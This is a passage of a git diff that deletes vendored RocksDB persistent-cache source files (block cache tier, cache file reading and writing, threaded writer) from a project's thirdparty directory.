-    stats_.read_miss_latency_.Add(timer.ElapsedNanos() / 1000);
-    return Status::NotFound("blockcache: key not found");
-  }
-
-  BlockCacheFile* const file = metadata_.Lookup(lba.cache_id_);
-  if (!file) {
-    // this can happen because the block index and cache file index are
-    // different, and the cache file might be removed between the two lookups
-    stats_.cache_misses_++;
-    stats_.read_miss_latency_.Add(timer.ElapsedNanos() / 1000);
-    return Status::NotFound("blockcache: cache file not found");
-  }
-
-  assert(file->refs_);
-
-  unique_ptr<char[]> scratch(new char[lba.size_]);
-  Slice blk_key;
-  Slice blk_val;
-
-  status = file->Read(lba, &blk_key, &blk_val, scratch.get());
-  --file->refs_;
-  if (!status) {
-    stats_.cache_misses_++;
-    stats_.cache_errors_++;
-    stats_.read_miss_latency_.Add(timer.ElapsedNanos() / 1000);
-    return Status::NotFound("blockcache: error reading data");
-  }
-
-  assert(blk_key == key);
-
-  val->reset(new char[blk_val.size()]);
-  memcpy(val->get(), blk_val.data(), blk_val.size());
-  *size = blk_val.size();
-
-  stats_.bytes_read_.Add(*size);
-  stats_.cache_hits_++;
-  stats_.read_hit_latency_.Add(timer.ElapsedNanos() / 1000);
-
-  return Status::OK();
-}
-
-bool BlockCacheTier::Erase(const Slice& key) {
-  WriteLock _(&lock_);
-  BlockInfo* info = metadata_.Remove(key);
-  assert(info);
-  delete info;
-  return true;
-}
-
-Status BlockCacheTier::NewCacheFile() {
-  lock_.AssertHeld();
-
-  TEST_SYNC_POINT_CALLBACK("BlockCacheTier::NewCacheFile:DeleteDir",
-                           (void*)(GetCachePath().c_str()));
-
-  std::unique_ptr<WriteableCacheFile> f(
-    new WriteableCacheFile(opt_.env, &buffer_allocator_, &writer_,
-                           GetCachePath(), writer_cache_id_,
-                           opt_.cache_file_size, opt_.log));
-
-  bool status = f->Create(opt_.enable_direct_writes, opt_.enable_direct_reads);
-  if (!status) {
-    return Status::IOError("Error creating file");
-  }
-
-  Info(opt_.log, "Created cache file %d", writer_cache_id_);
-
-  writer_cache_id_++;
-  cache_file_ = f.release();
-
-  // insert to cache files tree
-  status = metadata_.Insert(cache_file_);
-  assert(status);
-  if (!status) {
-    Error(opt_.log, "Error inserting to metadata");
-    return Status::IOError("Error inserting to metadata");
-  }
-
-  return Status::OK();
-}
-
-bool BlockCacheTier::Reserve(const size_t size) {
-  WriteLock _(&lock_);
-  assert(size_ <= opt_.cache_size);
-
-  if (size + size_ <= opt_.cache_size) {
-    // there is enough space to write
-    size_ += size;
-    return true;
-  }
-
-  assert(size + size_ >= opt_.cache_size);
-  // there is not enough space to fit the requested data
-  // we can clear some space by evicting cold data
-
-  const double retain_fac = (100 - kEvictPct) / static_cast<double>(100);
-  while (size + size_ > opt_.cache_size * retain_fac) {
-    unique_ptr<BlockCacheFile> f(metadata_.Evict());
-    if (!f) {
-      // nothing is evictable
-      return false;
-    }
-    assert(!f->refs_);
-    uint64_t file_size;
-    if (!f->Delete(&file_size).ok()) {
-      // unable to delete file
-      return false;
-    }
-
-    assert(file_size <= size_);
-    size_ -= file_size;
-  }
-
-  size_ += size;
-  assert(size_ <= opt_.cache_size * 0.9);
-  return true;
-}
-
-Status NewPersistentCache(Env* const env, const std::string& path,
-                          const uint64_t size,
-                          const std::shared_ptr<Logger>& log,
-                          const bool optimized_for_nvm,
-                          std::shared_ptr<PersistentCache>* cache) {
-  if (!cache) {
-    return Status::IOError("invalid argument cache");
-  }
-
-  auto opt = PersistentCacheConfig(env, path, size, log);
-  if (optimized_for_nvm) {
-    // the default settings are optimized for SSD
-    // NVM devices are better accessed with 4K direct IO and written with
-    // parallelism
-    opt.enable_direct_writes = true;
-    opt.writer_qdepth = 4;
-    opt.writer_dispatch_size = 4 * 1024;
-  }
-
-  auto pcache = std::make_shared<BlockCacheTier>(opt);
-  Status s = pcache->Open();
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  *cache = pcache;
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ifndef ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.h b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.h
deleted file mode 100644
index 9a8dec3..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.h
+++ /dev/null
@@ -1,156 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#ifndef  OS_WIN
-#include <unistd.h>
-#endif // ! OS_WIN
-
-#include <atomic>
-#include <list>
-#include <memory>
-#include <set>
-#include <sstream>
-#include <stdexcept>
-#include <string>
-#include <thread>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/persistent_cache.h"
-
-#include "utilities/persistent_cache/block_cache_tier_file.h"
-#include "utilities/persistent_cache/block_cache_tier_metadata.h"
-#include "utilities/persistent_cache/persistent_cache_util.h"
-
-#include "memtable/skiplist.h"
-#include "monitoring/histogram.h"
-#include "port/port.h"
-#include "util/arena.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-//
-// Block cache tier implementation
-//
-class BlockCacheTier : public PersistentCacheTier {
- public:
-  explicit BlockCacheTier(const PersistentCacheConfig& opt)
-      : opt_(opt),
-        insert_ops_(opt_.max_write_pipeline_backlog_size),
-        buffer_allocator_(opt.write_buffer_size, opt.write_buffer_count()),
-        writer_(this, opt_.writer_qdepth, opt_.writer_dispatch_size) {
-    Info(opt_.log, "Initializing allocator. size=%d B count=%d",
-         opt_.write_buffer_size, opt_.write_buffer_count());
-  }
-
-  virtual ~BlockCacheTier() {
-    // Close is re-entrant so we can call close even if it is already closed
-    Close();
-    assert(!insert_th_.joinable());
-  }
-
-  Status Insert(const Slice& key, const char* data, const size_t size) override;
-  Status Lookup(const Slice& key, std::unique_ptr<char[]>* data,
-                size_t* size) override;
-  Status Open() override;
-  Status Close() override;
-  bool Erase(const Slice& key) override;
-  bool Reserve(const size_t size) override;
-
-  bool IsCompressed() override { return opt_.is_compressed; }
-
-  std::string GetPrintableOptions() const override { return opt_.ToString(); }
-
-  PersistentCache::StatsType Stats() override;
-
-  void TEST_Flush() override {
-    while (insert_ops_.Size()) {
-      /* sleep override */
-      Env::Default()->SleepForMicroseconds(1000000);
-    }
-  }
-
- private:
-  // Percentage of cache to be evicted when the cache is full
-  static const size_t kEvictPct = 10;
-  // Max attempts to insert key, value to cache in pipelined mode
-  static const size_t kMaxRetry = 3;
-
-  // Pipelined operation
-  struct InsertOp {
-    explicit InsertOp(const bool signal) : signal_(signal) {}
-    explicit InsertOp(std::string&& key, const std::string& data)
-        : key_(std::move(key)), data_(data) {}
-    ~InsertOp() {}
-
-    InsertOp() = delete;
-    InsertOp(InsertOp&& rhs) = default;
-    InsertOp& operator=(InsertOp&& rhs) = default;
-
-    // used for estimating size by bounded queue
-    size_t Size() { return data_.size() + key_.size(); }
-
-    std::string key_;
-    std::string data_;
-    const bool signal_ = false;  // signal to request processing thread to exit
-  };
-
-  // entry point for insert thread
-  void InsertMain();
-  // insert implementation
-  Status InsertImpl(const Slice& key, const Slice& data);
-  // Create a new cache file
-  Status NewCacheFile();
-  // Get cache directory path
-  std::string GetCachePath() const { return opt_.path + "/cache"; }
-  // Cleanup folder
-  Status CleanupCacheFolder(const std::string& folder);
-
-  // Statistics
-  struct Statistics {
-    HistogramImpl bytes_pipelined_;
-    HistogramImpl bytes_written_;
-    HistogramImpl bytes_read_;
-    HistogramImpl read_hit_latency_;
-    HistogramImpl read_miss_latency_;
-    HistogramImpl write_latency_;
-    std::atomic<uint64_t> cache_hits_{0};
-    std::atomic<uint64_t> cache_misses_{0};
-    std::atomic<uint64_t> cache_errors_{0};
-    std::atomic<uint64_t> insert_dropped_{0};
-
-    double CacheHitPct() const {
-      const auto lookups = cache_hits_ + cache_misses_;
-      return lookups ? 100 * cache_hits_ / static_cast<double>(lookups) : 0.0;
-    }
-
-    double CacheMissPct() const {
-      const auto lookups = cache_hits_ + cache_misses_;
-      return lookups ? 100 * cache_misses_ / static_cast<double>(lookups) : 0.0;
-    }
-  };
-
-  port::RWMutex lock_;                          // Synchronization
-  const PersistentCacheConfig opt_;             // BlockCache options
-  BoundedQueue<InsertOp> insert_ops_;           // Ops waiting for insert
-  rocksdb::port::Thread insert_th_;                       // Insert thread
-  uint32_t writer_cache_id_ = 0;                // Current cache file identifier
-  WriteableCacheFile* cache_file_ = nullptr;    // Current cache file reference
-  CacheWriteBufferAllocator buffer_allocator_;  // Buffer provider
-  ThreadedWriter writer_;                       // Writer threads
-  BlockCacheTierMetadata metadata_;             // Cache meta data manager
-  std::atomic<uint64_t> size_{0};               // Size of the cache
-  Statistics stats_;                                 // Statistics
-};
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.cc b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.cc
deleted file mode 100644
index 85e0610..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.cc
+++ /dev/null
@@ -1,593 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/block_cache_tier_file.h"
-
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#include <functional>
-#include <memory>
-#include <vector>
-
-#include "port/port.h"
-#include "util/crc32c.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-//
-// File creation factories
-//
-Status NewWritableCacheFile(Env* const env, const std::string& filepath,
-                            std::unique_ptr<WritableFile>* file,
-                            const bool use_direct_writes = false) {
-  EnvOptions opt;
-  opt.use_direct_writes = use_direct_writes;
-  Status s = env->NewWritableFile(filepath, file, opt);
-  return s;
-}
-
-Status NewRandomAccessCacheFile(Env* const env, const std::string& filepath,
-                                std::unique_ptr<RandomAccessFile>* file,
-                                const bool use_direct_reads = true) {
-  EnvOptions opt;
-  opt.use_direct_reads = use_direct_reads;
-  Status s = env->NewRandomAccessFile(filepath, file, opt);
-  return s;
-}
-
-//
-// BlockCacheFile
-//
-Status BlockCacheFile::Delete(uint64_t* size) {
-  Status status = env_->GetFileSize(Path(), size);
-  if (!status.ok()) {
-    return status;
-  }
-  return env_->DeleteFile(Path());
-}
-
-//
-// CacheRecord
-//
-// Cache record represents the record on disk
-//
-// +--------+---------+----------+------------+---------------+-------------+
-// | magic  | crc     | key size | value size | key data      | value data  |
-// +--------+---------+----------+------------+---------------+-------------+
-// <-- 4 --><-- 4  --><-- 4   --><-- 4     --><-- key size  --><-- v-size -->
-//
-struct CacheRecordHeader {
-  CacheRecordHeader() {}
-  CacheRecordHeader(const uint32_t magic, const uint32_t key_size,
-                    const uint32_t val_size)
-      : magic_(magic), crc_(0), key_size_(key_size), val_size_(val_size) {}
-
-  uint32_t magic_;
-  uint32_t crc_;
-  uint32_t key_size_;
-  uint32_t val_size_;
-};
-
-struct CacheRecord {
-  CacheRecord() {}
-  CacheRecord(const Slice& key, const Slice& val)
-      : hdr_(MAGIC, static_cast<uint32_t>(key.size()),
-             static_cast<uint32_t>(val.size())),
-        key_(key),
-        val_(val) {
-    hdr_.crc_ = ComputeCRC();
-  }
-
-  uint32_t ComputeCRC() const;
-  bool Serialize(std::vector<CacheWriteBuffer*>* bufs, size_t* woff);
-  bool Deserialize(const Slice& buf);
-
-  static uint32_t CalcSize(const Slice& key, const Slice& val) {
-    return static_cast<uint32_t>(sizeof(CacheRecordHeader) + key.size() +
-                                 val.size());
-  }
-
-  static const uint32_t MAGIC = 0xfefa;
-
-  bool Append(std::vector<CacheWriteBuffer*>* bufs, size_t* woff,
-              const char* data, const size_t size);
-
-  CacheRecordHeader hdr_;
-  Slice key_;
-  Slice val_;
-};
-
-static_assert(sizeof(CacheRecordHeader) == 16, "DataHeader is not aligned");
-
-uint32_t CacheRecord::ComputeCRC() const {
-  uint32_t crc = 0;
-  CacheRecordHeader tmp = hdr_;
-  tmp.crc_ = 0;
-  crc = crc32c::Extend(crc, reinterpret_cast<const char*>(&tmp), sizeof(tmp));
-  crc = crc32c::Extend(crc, reinterpret_cast<const char*>(key_.data()),
-                       key_.size());
-  crc = crc32c::Extend(crc, reinterpret_cast<const char*>(val_.data()),
-                       val_.size());
-  return crc;
-}
-
-bool CacheRecord::Serialize(std::vector<CacheWriteBuffer*>* bufs,
-                            size_t* woff) {
-  assert(bufs->size());
-  return Append(bufs, woff, reinterpret_cast<const char*>(&hdr_),
-                sizeof(hdr_)) &&
-         Append(bufs, woff, reinterpret_cast<const char*>(key_.data()),
-                key_.size()) &&
-         Append(bufs, woff, reinterpret_cast<const char*>(val_.data()),
-                val_.size());
-}
-
-bool CacheRecord::Append(std::vector<CacheWriteBuffer*>* bufs, size_t* woff,
-                         const char* data, const size_t data_size) {
-  assert(*woff < bufs->size());
-
-  const char* p = data;
-  size_t size = data_size;
-
-  while (size && *woff < bufs->size()) {
-    CacheWriteBuffer* buf = (*bufs)[*woff];
-    const size_t free = buf->Free();
-    if (size <= free) {
-      buf->Append(p, size);
-      size = 0;
-    } else {
-      buf->Append(p, free);
-      p += free;
-      size -= free;
-      assert(!buf->Free());
-      assert(buf->Used() == buf->Capacity());
-    }
-
-    if (!buf->Free()) {
-      *woff += 1;
-    }
-  }
-
-  assert(!size);
-
-  return !size;
-}
-
-bool CacheRecord::Deserialize(const Slice& data) {
-  assert(data.size() >= sizeof(CacheRecordHeader));
-  if (data.size() < sizeof(CacheRecordHeader)) {
-    return false;
-  }
-
-  memcpy(&hdr_, data.data(), sizeof(hdr_));
-
-  assert(hdr_.key_size_ + hdr_.val_size_ + sizeof(hdr_) == data.size());
-  if (hdr_.key_size_ + hdr_.val_size_ + sizeof(hdr_) != data.size()) {
-    return false;
-  }
-
-  key_ = Slice(data.data_ + sizeof(hdr_), hdr_.key_size_);
-  val_ = Slice(key_.data_ + hdr_.key_size_, hdr_.val_size_);
-
-  if (!(hdr_.magic_ == MAGIC && ComputeCRC() == hdr_.crc_)) {
-    fprintf(stderr, "** magic %d ** \n", hdr_.magic_);
-    fprintf(stderr, "** key_size %d ** \n", hdr_.key_size_);
-    fprintf(stderr, "** val_size %d ** \n", hdr_.val_size_);
-    fprintf(stderr, "** key %s ** \n", key_.ToString().c_str());
-    fprintf(stderr, "** val %s ** \n", val_.ToString().c_str());
-    for (size_t i = 0; i < hdr_.val_size_; ++i) {
-      fprintf(stderr, "%d.", (uint8_t)val_.data()[i]);
-    }
-    fprintf(stderr, "\n** cksum %d != %d **", hdr_.crc_, ComputeCRC());
-  }
-
-  assert(hdr_.magic_ == MAGIC && ComputeCRC() == hdr_.crc_);
-  return hdr_.magic_ == MAGIC && ComputeCRC() == hdr_.crc_;
-}
-
-//
-// RandomAccessFile
-//
-
-bool RandomAccessCacheFile::Open(const bool enable_direct_reads) {
-  WriteLock _(&rwlock_);
-  return OpenImpl(enable_direct_reads);
-}
-
-bool RandomAccessCacheFile::OpenImpl(const bool enable_direct_reads) {
-  rwlock_.AssertHeld();
-
-  ROCKS_LOG_DEBUG(log_, "Opening cache file %s", Path().c_str());
-
-  std::unique_ptr<RandomAccessFile> file;
-  Status status =
-      NewRandomAccessCacheFile(env_, Path(), &file, enable_direct_reads);
-  if (!status.ok()) {
-    Error(log_, "Error opening random access file %s. %s", Path().c_str(),
-          status.ToString().c_str());
-    return false;
-  }
-  freader_.reset(new RandomAccessFileReader(std::move(file), Path(), env_));
-
-  return true;
-}
-
-bool RandomAccessCacheFile::Read(const LBA& lba, Slice* key, Slice* val,
-                                 char* scratch) {
-  ReadLock _(&rwlock_);
-
-  assert(lba.cache_id_ == cache_id_);
-
-  if (!freader_) {
-    return false;
-  }
-
-  Slice result;
-  Status s = freader_->Read(lba.off_, lba.size_, &result, scratch);
-  if (!s.ok()) {
-    Error(log_, "Error reading from file %s. %s", Path().c_str(),
-          s.ToString().c_str());
-    return false;
-  }
-
-  assert(result.data() == scratch);
-
-  return ParseRec(lba, key, val, scratch);
-}
-
-bool RandomAccessCacheFile::ParseRec(const LBA& lba, Slice* key, Slice* val,
-                                     char* scratch) {
-  Slice data(scratch, lba.size_);
-
-  CacheRecord rec;
-  if (!rec.Deserialize(data)) {
-    assert(!"Error deserializing data");
-    Error(log_, "Error de-serializing record from file %s off %d",
-          Path().c_str(), lba.off_);
-    return false;
-  }
-
-  *key = Slice(rec.key_);
-  *val = Slice(rec.val_);
-
-  return true;
-}
-
-//
-// WriteableCacheFile
-//
-
-WriteableCacheFile::~WriteableCacheFile() {
-  WriteLock _(&rwlock_);
-  if (!eof_) {
-    // This file never flushed. We give priority to shutdown since this is a
-    // cache
-    // TODO(krad): Figure a way to flush the pending data
-    if (file_) {
-      assert(refs_ == 1);
-      --refs_;
-    }
-  }
-  assert(!refs_);
-  ClearBuffers();
-}
-
-bool WriteableCacheFile::Create(const bool enable_direct_writes,
-                                const bool enable_direct_reads) {
-  WriteLock _(&rwlock_);
-
-  enable_direct_reads_ = enable_direct_reads;
-
-  ROCKS_LOG_DEBUG(log_, "Creating new cache %s (max size is %d B)",
-                  Path().c_str(), max_size_);
-
-  Status s = env_->FileExists(Path());
-  if (s.ok()) {
-    ROCKS_LOG_WARN(log_, "File %s already exists. %s", Path().c_str(),
-                   s.ToString().c_str());
-  }
-
-  s = NewWritableCacheFile(env_, Path(), &file_);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(log_, "Unable to create file %s. %s", Path().c_str(),
-                   s.ToString().c_str());
-    return false;
-  }
-
-  assert(!refs_);
-  ++refs_;
-
-  return true;
-}
-
-bool WriteableCacheFile::Append(const Slice& key, const Slice& val, LBA* lba) {
-  WriteLock _(&rwlock_);
-
-  if (eof_) {
-    // We can't append since the file is full
-    return false;
-  }
-
-  // estimate the space required to store the (key, val)
-  uint32_t rec_size = CacheRecord::CalcSize(key, val);
-
-  if (!ExpandBuffer(rec_size)) {
-    // unable to expand the buffer
-    ROCKS_LOG_DEBUG(log_, "Error expanding buffers. size=%d", rec_size);
-    return false;
-  }
-
-  lba->cache_id_ = cache_id_;
-  lba->off_ = disk_woff_;
-  lba->size_ = rec_size;
-
-  CacheRecord rec(key, val);
-  if (!rec.Serialize(&bufs_, &buf_woff_)) {
-    // unexpected error: unable to serialize the data
-    assert(!"Error serializing record");
-    return false;
-  }
-
-  disk_woff_ += rec_size;
-  eof_ = disk_woff_ >= max_size_;
-
-  // dispatch buffer for flush
-  DispatchBuffer();
-
-  return true;
-}
-
-bool WriteableCacheFile::ExpandBuffer(const size_t size) {
-  rwlock_.AssertHeld();
-  assert(!eof_);
-
-  // determine if there is enough space
-  size_t free = 0;  // compute the free space left in buffer
-  for (size_t i = buf_woff_; i < bufs_.size(); ++i) {
-    free += bufs_[i]->Free();
-    if (size <= free) {
-      // we have enough space in the buffer
-      return true;
-    }
-  }
-
-  // expand the buffer until there is enough space to write `size` bytes
-  assert(free < size);
-  while (free < size) {
-    CacheWriteBuffer* const buf = alloc_->Allocate();
-    if (!buf) {
-      ROCKS_LOG_DEBUG(log_, "Unable to allocate buffers");
-      return false;
-    }
-
-    size_ += static_cast<uint32_t>(buf->Free());
-    free += buf->Free();
-    bufs_.push_back(buf);
-  }
-
-  assert(free >= size);
-  return true;
-}
-
-void WriteableCacheFile::DispatchBuffer() {
-  rwlock_.AssertHeld();
-
-  assert(bufs_.size());
-  assert(buf_doff_ <= buf_woff_);
-  assert(buf_woff_ <= bufs_.size());
-
-  if (pending_ios_) {
-    return;
-  }
-
-  if (!eof_ && buf_doff_ == buf_woff_) {
-    // dispatch buffer is pointing to write buffer and we haven't hit eof
-    return;
-  }
-
-  assert(eof_ || buf_doff_ < buf_woff_);
-  assert(buf_doff_ < bufs_.size());
-  assert(file_);
-
-  auto* buf = bufs_[buf_doff_];
-  const uint64_t file_off = buf_doff_ * alloc_->BufferSize();
-
-  assert(!buf->Free() ||
-         (eof_ && buf_doff_ == buf_woff_ && buf_woff_ < bufs_.size()));
-  // we have reached end of file, and there is space in the last buffer
-  // pad it with zero for direct IO
-  buf->FillTrailingZeros();
-
-  assert(buf->Used() % kFileAlignmentSize == 0);
-
-  writer_->Write(file_.get(), buf, file_off,
-                 std::bind(&WriteableCacheFile::BufferWriteDone, this));
-  pending_ios_++;
-  buf_doff_++;
-}
-
-void WriteableCacheFile::BufferWriteDone() {
-  WriteLock _(&rwlock_);
-
-  assert(bufs_.size());
-
-  pending_ios_--;
-
-  if (buf_doff_ < bufs_.size()) {
-    DispatchBuffer();
-  }
-
-  if (eof_ && buf_doff_ >= bufs_.size() && !pending_ios_) {
-    // end-of-file reached, move to read mode
-    CloseAndOpenForReading();
-  }
-}
-
-void WriteableCacheFile::CloseAndOpenForReading() {
-  // Our env abstraction do not allow reading from a file opened for appending
-  // We need close the file and re-open it for reading
-  Close();
-  RandomAccessCacheFile::OpenImpl(enable_direct_reads_);
-}
-
-bool WriteableCacheFile::ReadBuffer(const LBA& lba, Slice* key, Slice* block,
-                                    char* scratch) {
-  rwlock_.AssertHeld();
-
-  if (!ReadBuffer(lba, scratch)) {
-    Error(log_, "Error reading from buffer. cache=%d off=%d", cache_id_,
-          lba.off_);
-    return false;
-  }
-
-  return ParseRec(lba, key, block, scratch);
-}
-
-bool WriteableCacheFile::ReadBuffer(const LBA& lba, char* data) {
-  rwlock_.AssertHeld();
-
-  assert(lba.off_ < disk_woff_);
-
-  // we read from the buffers like reading from a flat file. The list of buffers
-  // are treated as contiguous stream of data
-
-  char* tmp = data;
-  size_t pending_nbytes = lba.size_;
-  // start buffer
-  size_t start_idx = lba.off_ / alloc_->BufferSize();
-  // offset into the start buffer
-  size_t start_off = lba.off_ % alloc_->BufferSize();
-
-  assert(start_idx <= buf_woff_);
-
-  for (size_t i = start_idx; pending_nbytes && i < bufs_.size(); ++i) {
-    assert(i <= buf_woff_);
-    auto* buf = bufs_[i];
-    assert(i == buf_woff_ || !buf->Free());
-    // bytes to write to the buffer
-    size_t nbytes = pending_nbytes > (buf->Used() - start_off)
-                        ? (buf->Used() - start_off)
-                        : pending_nbytes;
-    memcpy(tmp, buf->Data() + start_off, nbytes);
-
-    // left over to be written
-    pending_nbytes -= nbytes;
-    start_off = 0;
-    tmp += nbytes;
-  }
-
-  assert(!pending_nbytes);
-  if (pending_nbytes) {
-    return false;
-  }
-
-  assert(tmp == data + lba.size_);
-  return true;
-}
-
-void WriteableCacheFile::Close() {
-  rwlock_.AssertHeld();
-
-  assert(size_ >= max_size_);
-  assert(disk_woff_ >= max_size_);
-  assert(buf_doff_ == bufs_.size());
-  assert(bufs_.size() - buf_woff_ <= 1);
-  assert(!pending_ios_);
-
-  Info(log_, "Closing file %s. size=%d written=%d", Path().c_str(), size_,
-       disk_woff_);
-
-  ClearBuffers();
-  file_.reset();
-
-  assert(refs_);
-  --refs_;
-}
-
-void WriteableCacheFile::ClearBuffers() {
-  for (size_t i = 0; i < bufs_.size(); ++i) {
-    alloc_->Deallocate(bufs_[i]);
-  }
-
-  bufs_.clear();
-}
-
-//
-// ThreadedFileWriter implementation
-//
-ThreadedWriter::ThreadedWriter(PersistentCacheTier* const cache,
-                               const size_t qdepth, const size_t io_size)
-    : Writer(cache), io_size_(io_size) {
-  for (size_t i = 0; i < qdepth; ++i) {
-    port::Thread th(&ThreadedWriter::ThreadMain, this);
-    threads_.push_back(std::move(th));
-  }
-}
-
-void ThreadedWriter::Stop() {
-  // notify all threads to exit
-  for (size_t i = 0; i < threads_.size(); ++i) {
-    q_.Push(IO(/*signal=*/true));
-  }
-
-  // wait for all threads to exit
-  for (auto& th : threads_) {
-    th.join();
-    assert(!th.joinable());
-  }
-  threads_.clear();
-}
-
-void ThreadedWriter::Write(WritableFile* const file, CacheWriteBuffer* buf,
-                           const uint64_t file_off,
-                           const std::function<void()> callback) {
-  q_.Push(IO(file, buf, file_off, callback));
-}
-
-void ThreadedWriter::ThreadMain() {
-  while (true) {
-    // Fetch the IO to process
-    IO io(q_.Pop());
-    if (io.signal_) {
-      // that's secret signal to exit
-      break;
-    }
-
-    // Reserve space for writing the buffer
-    while (!cache_->Reserve(io.buf_->Used())) {
-      // We can fail to reserve space if every file in the system
-      // is being currently accessed
-      /* sleep override */
-      Env::Default()->SleepForMicroseconds(1000000);
-    }
-
-    DispatchIO(io);
-
-    io.callback_();
-  }
-}
-
-void ThreadedWriter::DispatchIO(const IO& io) {
-  size_t written = 0;
-  while (written < io.buf_->Used()) {
-    Slice data(io.buf_->Data() + written, io_size_);
-    Status s = io.file_->Append(data);
-    assert(s.ok());
-    if (!s.ok()) {
-      // That is definite IO error to device. There is not much we can
-      // do but ignore the failure. This can lead to corruption of data on
-      // disk, but the cache will skip while reading
-      fprintf(stderr, "Error writing data to file. %s\n", s.ToString().c_str());
-    }
-    written += io_size_;
-  }
-}
-
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.h b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.h
deleted file mode 100644
index 3922136..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier_file.h
+++ /dev/null
@@ -1,293 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <list>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-
-#include "utilities/persistent_cache/block_cache_tier_file_buffer.h"
-#include "utilities/persistent_cache/lrulist.h"
-#include "utilities/persistent_cache/persistent_cache_tier.h"
-#include "utilities/persistent_cache/persistent_cache_util.h"
-
-#include "port/port.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/mutexlock.h"
-
-// The io code path of persistent cache uses pipelined architecture
-//
-// client -> In Queue <-- BlockCacheTier --> Out Queue <-- Writer <--> Kernel
-//
-// This would enable the system to scale for GB/s of throughput which is
-// expected with modern devies like NVM.
-//
-// The file level operations are encapsulated in the following abstractions
-//
-// BlockCacheFile
-//       ^
-//       |
-//       |
-// RandomAccessCacheFile (For reading)
-//       ^
-//       |
-//       |
-// WriteableCacheFile (For writing)
-//
-// Write IO code path :
-//
-namespace rocksdb {
-
-class WriteableCacheFile;
-struct BlockInfo;
-
-// Represents a logical record on device
-//
-// (L)ogical (B)lock (Address = { cache-file-id, offset, size }
-struct LogicalBlockAddress {
-  LogicalBlockAddress() {}
-  explicit LogicalBlockAddress(const uint32_t cache_id, const uint32_t off,
-                               const uint16_t size)
-      : cache_id_(cache_id), off_(off), size_(size) {}
-
-  uint32_t cache_id_ = 0;
-  uint32_t off_ = 0;
-  uint32_t size_ = 0;
-};
-
-typedef LogicalBlockAddress LBA;
-
-// class Writer
-//
-// Writer is the abstraction used for writing data to file. The component can be
-// multithreaded. It is the last step of write pipeline
-class Writer {
- public:
-  explicit Writer(PersistentCacheTier* const cache) : cache_(cache) {}
-  virtual ~Writer() {}
-
-  // write buffer to file at the given offset
-  virtual void Write(WritableFile* const file, CacheWriteBuffer* buf,
-                     const uint64_t file_off,
-                     const std::function<void()> callback) = 0;
-  // stop the writer
-  virtual void Stop() = 0;
-
-  PersistentCacheTier* const cache_;
-};
-
-// class BlockCacheFile
-//
-// Generic interface to support building file specialized for read/writing
-class BlockCacheFile : public LRUElement<BlockCacheFile> {
- public:
-  explicit BlockCacheFile(const uint32_t cache_id)
-      : LRUElement<BlockCacheFile>(), cache_id_(cache_id) {}
-
-  explicit BlockCacheFile(Env* const env, const std::string& dir,
-                          const uint32_t cache_id)
-      : LRUElement<BlockCacheFile>(),
-        env_(env),
-        dir_(dir),
-        cache_id_(cache_id) {}
-
-  virtual ~BlockCacheFile() {}
-
-  // append key/value to file and return LBA locator to user
-  virtual bool Append(const Slice& key, const Slice& val, LBA* const lba) {
-    assert(!"not implemented");
-    return false;
-  }
-
-  // read from the record locator (LBA) and return key, value and status
-  virtual bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) {
-    assert(!"not implemented");
-    return false;
-  }
-
-  // get file path
-  std::string Path() const {
-    return dir_ + "/" + std::to_string(cache_id_) + ".rc";
-  }
-  // get cache ID
-  uint32_t cacheid() const { return cache_id_; }
-  // Add block information to file data
-  // Block information is the list of index reference for this file
-  virtual void Add(BlockInfo* binfo) {
-    WriteLock _(&rwlock_);
-    block_infos_.push_back(binfo);
-  }
-  // get block information
-  std::list<BlockInfo*>& block_infos() { return block_infos_; }
-  // delete file and return the size of the file
-  virtual Status Delete(uint64_t* size);
-
- protected:
-  port::RWMutex rwlock_;               // synchronization mutex
-  Env* const env_ = nullptr;           // Env for IO
-  const std::string dir_;              // Directory name
-  const uint32_t cache_id_;            // Cache id for the file
-  std::list<BlockInfo*> block_infos_;  // List of index entries mapping to the
-                                       // file content
-};
-
-// class RandomAccessFile
-//
-// Thread safe implementation for reading random data from file
-class RandomAccessCacheFile : public BlockCacheFile {
- public:
-  explicit RandomAccessCacheFile(Env* const env, const std::string& dir,
-                                 const uint32_t cache_id,
-                                 const shared_ptr<Logger>& log)
-      : BlockCacheFile(env, dir, cache_id), log_(log) {}
-
-  virtual ~RandomAccessCacheFile() {}
-
-  // open file for reading
-  bool Open(const bool enable_direct_reads);
-  // read data from the disk
